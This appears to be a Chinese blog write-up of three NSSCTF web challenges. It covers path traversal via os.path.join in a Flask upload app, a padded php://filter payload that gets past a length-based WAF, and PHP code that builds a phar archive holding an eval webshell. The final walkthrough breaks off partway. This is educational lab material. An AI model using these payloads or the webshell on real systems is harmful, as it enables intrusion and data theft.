nssctf web

最新推荐文章于 2024-10-08 17:48:41 发布
最新推荐文章于 2024-10-08 17:48:41 发布
阅读量534 收藏 1
点赞数 1
分类专栏: nssctf web入门 文章标签: 前端 flask python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61988806/article/details/130404400
版权
文章详细介绍了两个CTF比赛的挑战,一个是通过分析Flask应用源码找到文件上传漏洞,利用os.path.join的特性尝试获取/flag路径。另一个涉及PHP的include操作,通过构造长URL和使用phar伪协议绕过WAF来读取flag.php的内容。
摘要由CSDN通过智能技术生成

[NISACTF 2022]babyupload

f12看源码得到/source

发现是一个压缩文件

from flask import Flask, request, redirect, g, send_from_directory
import sqlite3
import os
import uuid

app = Flask(__name__)

SCHEMA = """CREATE TABLE files (
id text primary key,
path text
);
"""


def db():
    g_db = getattr(g, '_database', None)
    if g_db is None:
        g_db = g._database = sqlite3.connect("database.db")
    return g_db


@app.before_first_request
def setup():
    os.remove("database.db")
    cur = db().cursor()
    cur.executescript(SCHEMA)


@app.route('/')
def hello_world():
    return """<!DOCTYPE html>
<html>
<body>
<form action="/upload" method="post" enctype="multipart/form-data">
    Select image to upload:
    <input type="file" name="file">
    <input type="submit" value="Upload File" name="submit">
</form>
<!-- /source -->
</body>
</html>"""


@app.route('/source')
def source():
    return send_from_directory(directory="/var/www/html/", path="www.zip", as_attachment=True)


@app.route('/upload', methods=['POST'])
def upload():
    if 'file' not in request.files:
        return redirect('/')
    file = request.files['file']
    if "." in file.filename:     #这里过滤了.
        return "Bad filename!", 403
    conn = db()
    cur = conn.cursor()
    uid = uuid.uuid4().hex
    try:
        cur.execute("insert into files (id, path) values (?, ?)", (uid, file.filename,))
    except sqlite3.IntegrityError:
        return "Duplicate file"
    conn.commit()

    file.save('uploads/' + file.filename)  
    return redirect('/file/' + uid)


@app.route('/file/<id>')
def file(id):
    conn = db()
    cur = conn.cursor()
    cur.execute("select path from files where id=?", (id,))   #这里连接数据库查询文件的id值
    res = cur.fetchone()
    if res is None:
        return "File not found", 404

    # print(res[0])

    with open(os.path.join("uploads/", res[0]), "r") as f:   #这里通过os.path.join拼接绝对路径
        return f.read()


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

这里的os.path.join函数存在漏洞

import os
 
print("1:",os.path.join('a','/b','c.txt'))
 
print("2:",os.path.join('/a','/b','/c.txt'))
 
print("3:",os.path.join('/a','./d','c.txt'))


#输出结果
/b\c.txt
/c.txt
/a\./d\c.txt

os.path.join函数会以最后一个/开始拼接 如果存在./那所有的参数保留

所以我们传入/flag 因为是/所以会以/flag为拼接

                

得到文件所在的地方

 [鹏城杯 2022]简单包含

 <?php 
highlight_file(__FILE__);  #显示当前文件代码
include($_POST["flag"]);    #include包含文件 通过include包含post传入的flag的值
//flag in /var/www/html/flag.php;

 使用伪协议尝试读取发现存在waf

 

 if (strlen(file_get_contents('php://input')) < 800 && preg_match('/flag/', $path)) {

这里我们发现url通过input传递的值小于800会报错

使用我们可以构造足够多的字符来绕过

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&flag=php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php

[NISACTF 2022]bingdundun~

 

这里发现url传入了参数

这里可以传入压缩包 尝试phar伪协议

创建phar包

<?php
$phar = new Phar("zx.phar");    #创建新的phar文档
$phar->startBuffering();        #缓冲数据到内存中,不直接进入phar文件
$phar->setStub("<?php __HALT_COMPILER(); ?>"); #设置phar的stub,stub是文件被include和require的时候最先执行的代码。这里stub中代表停止php解析,避免解析phar中的内容
$phar->addFromString("zx.php",'<?php eval($_REQUEST["zx"]); ?>');  #向phar文件中添加一个zx.php的文件,内容是<?php eval($_REQUEST["zx"]); 
$phar->stopBuffering();         #将内存中的缓存数据写入zx.phar中
?>

 然后有俩种方法一是直接在网页打开然后会生成phar文件

但是我这里网页打开没有用

如果报错改成off

然后还会可以使用命令

 

 

得到phar

将phar压缩为zip 上传

 

 

 

 

 

 

 

 

许允er
关注
专栏目录
NSSCTF-[BSidesSF-CTF 2019] Zippy(详细解题思路)
m0_75030189的博客
05-05 430
该题目主要考察了对流量包的基本分析和压缩包文件头的识别
2020-CSR-CTF-Web-复盘以及分析
蚁景网安学院
12-02 924
2020 年 10 月 31 日万圣节举办的德国比赛,界面很有特色,web 题目质量很高,队伍只出了三道,结束后通通复盘了一遍深入理解。题目从易到难一共有十道,其中九道有出,本篇只详细分析解数多的五道,其余四道比赛时只有个位数 solve ,打算后续专门写四篇结合相应漏洞讲述。
NSSCTF]ctfweb题目-学习笔记 1day
ZhangAweio的博客
04-16 1108
今天题目类型有sql注入、getshell、XFF伪造请求头、MD5简单绕过、rec远程命令执行、[SWPUCTF 2021 新生赛]easyrce、[SWPUCTF 2021 新生赛]Do_you_know_http、[SWPUCTF 2021 新生赛]babyrce。
对一道ctf赛题的详细分析
蚁景网安学院
11-23 860
原创稿件征集邮箱:edu@antvsion.comQQ:3200599554黑客极客技术、信息安全热点安全研究分析等安全相关的技术文章稿件通过并发布还能收获200-800元不等的稿酬0x0...
NSSCTF WEB 题解(一)
2301_81105268的博客
06-04 1254
题目提示:F12下发环境,打开网址,进入网页后点击F12查看源代码直接查找flag可以得到flag。
NSSCTF web刷题记录6
rev1ve的博客
11-21 739
引用了vm2,有JSON.parse解析,并且存在merge方法,clone调用了merge,存在原型链污染漏洞。直接去网上找相关漏洞,发现是CVE-2021-26120(说是此版本修复但也不知道为啥能用)路由下接收name参数,如果存在且值不为admin,将输出JWT加密的token值;路由接收参数token,然后进行解密,如果为admin返回flag。然后把密钥放到我们解密网站,验证成功,我们直接修改为admin。中,.匹配除了换行符以外的所有字符,postmanPOST发送即可。
NSSCTF web学习
akxnxbshai的博客
09-30 1266
NSSCTF web刷题
NSSCTF web刷题记录7
rev1ve的博客
12-11 472
将url的字符串拿去解码,得到json格式数据。打开题目发现是curl命令,提示填入url。读取下环境变量,得到flag。
NSSCTF web刷题记录3
rev1ve的博客
10-28 735
使用 uniqid() 生成一个唯一的标识符,并将其与 .txt 扩展名拼接为文件名,赋值给变量 $uuid;这里关键是要去得到cookie_secret的值,借助百度,Tornado框架的附属文件handler.settings中存在cookie_secret,修改下payload。我们要把flag复制到app.py,但是我们不知道当前目录是什么,所以多尝试看看需要几个。分别赋值即可绕过,那么我们再来看看date函数,我们本地测试下。,然后结合存在app.py,我们用cp命令把。
NSSCTF web刷题记录4
rev1ve的博客
11-06 391
大体流程就是先获取所有的GET和POST请求,然后一次性发送,观察是否存在可利用的shell,如果成功再先判断所有的GET里是否存在,然后判断POST里是否存在shell,通过flag参数值判断为哪个方式,最后输出可利用的shell文件。分析一下,main函数首先检测参数是否小于2,然后创建了一个http.FileServer,并传入fs.CreateFileServFS()函数的返回值作为参数,能够访问文件。我们输入1,1看看,发现有hint是随机数,并且我们修改code的值,随机数固定不变。
NSSCTF 2nd WEB
ytl_storm的博客
09-25 354
当我们上传test.php/.这样的文件时候,因为file_put_contents()第一个参数是文件路径,操作系统会认为你要在test1.php文件所在的目录中创建一个名为.的文件,最后上传的结果就为test.php。这里绕过的主要原理是Tornado模板在渲染时会执行__tt_utf8(__tt_tmp) 这样的函数,所以将__tt_utf8设置为eval,然后将__tt_tmp设置为了从POST方法中接收的字符串导致了RCE。为具体的某个算法,则密钥是不能为空的。猜测这里存在SSRF漏洞。
NSSCTF-第五空间2021-wp
F1rstb100d
09-24 1206
NSSCTF-第五空间2021-wp
NSSCTF】刷题记录——[SWPUCTF 2021 新生赛]系列(WEB篇)
jameshuangchuan的博客
08-08 2997
此处主要在NSSCTF平台()上开展刷题。
NSSCTF-极客大挑战2020-web-wp
F1rstb100d
09-21 664
NSSCTF-极客大挑战2020-web-wp
NSSCTF-SWPUCTF 2021 新生赛-web-wp
F1rstb100d
09-19 771
NSSCTF-SWPUCTF 2021 新生赛-web-wp
前端的全栈混合之路Meteor篇:3.0新版本介绍
分享有趣的、贴近生活的CS知识
10-01 1156
Meteor全栈框架3.0版本终于稳定下来了,它的效果约等于webpack+vue+express+socket.io+mongodb+npm+uniapp,学一个搞定全套,值得学习了解下,最后找到适合于自己的技术栈。
Javascript数组研究03_手写实现_fill_filter_find_findIndex_findLast_findLastIndex
qq_33546823的博客
10-03 1238
fill()方法用一个固定值填充一个数组中从起始索引(默认为 0)到终止索引(默认为)内的全部元素。它返回修改后的数组。输入参数value:用来填充数组元素的值。start(可选):开始填充的位置,默认值为 0,索引处理方法和copyWithin一致。end(可选):停止填充的位置(不包含该位置),默认值为,索引处理方法和copyWithin方法一致。输出:修改后的原数组。注意事项该方法会改变原数组,是修改方法。对于稀疏数组,空槽也会被value填充。是通用的方法在空数组上不会有任何处理。
前端基础面试题·第四篇——Vue(其二)
最新发布
2301_76380626的博客
10-08 722
路由跳转 接收参数 params传递参数可以用过页面路由对象route的params属性访问到。 2.query传参 query 传参是通过URL的查询字符串来传递参数,这种方式传递的参数是可选的。 这种方式不需要提前配置路由路径,直接在路由跳转时在路径或者配置中传递参数即可。 路由跳转 接收参数 这种方式传递的参数会挂载到页面路由对象route的query对象上。 2. hash和history路由区别 hash路由地址上在路径后面带#号,history路由地址上不带#号. 在
快餐食品检测系统源码分享[一条龙教学YOLOV8标注好的数据集一键训练_70+全套改进创新点发刊_Web前端展示]
m0_73388125的博客
10-08 1154
数据集信息展示在本研究中,我们使用了名为“burger detection”的数据集,以改进YOLOv8在快餐食品检测系统中的表现。该数据集专门针对快餐食品的多样性进行设计,涵盖了六个主要类别,分别是:bbq、bread、bun、hotdog、pattty和patty。这些类别的选择不仅反映了快餐食品的常见种类,还考虑到了它们在实际应用中的重要性,尤其是在餐饮行业的食品识别和分类任务中。数据集的构建过程经过精心设计,确保每个类别的样本数量和质量都能满足深度学习模型训练的需求。
nssctf的jwt问3
08-17
3. 请确保您已经导入 `java.awt.image抱歉,我无法回答有关 nssctf 的问题。我是一个与开发者有关的 AI,.BufferedImage` 和 `javax.imageio.ImageIO` 类。 您可以根据需要修改保存图片的路径和文件名。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

许允er

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值